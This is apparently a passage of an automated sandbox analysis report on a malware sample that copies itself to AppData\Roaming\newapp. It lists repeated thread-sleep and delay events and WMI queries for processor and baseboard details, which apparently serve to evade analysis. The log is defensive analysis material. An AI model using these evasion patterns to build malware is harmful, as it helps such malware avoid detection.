                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599563
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599313
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599078
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598969
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598844
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595360
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594327
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594208
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594094
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 593860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6652Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3038Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWindow / User API: threadDelayed 2457Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWindow / User API: threadDelayed 7313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 3315Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 6264Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 8175
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 1637
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7852Thread sleep count: 2457 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7852Thread sleep count: 7313 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599753s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599280s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599168s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -599062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598951s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598842s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598487s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598349s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -597094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -596094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595842s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595732s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595285s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -595047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594700s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594251s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -594016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848Thread sleep time: -593906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7328Thread sleep count: 3315 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7328Thread sleep count: 6264 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599538s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599434s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599325s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -599214s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598884s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598764s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598655s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -598093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -597093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596162s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -596047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292Thread sleep time: -594187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 6968Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7744Thread sleep count: 8175 > 30
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7744Thread sleep count: 1637 > 30
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep count: 36 > 30
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -599078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -598110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -597110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -596110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -595110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594208s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -594094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep time: -593860s >= -30000s
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 922337203685477Jump to behavior
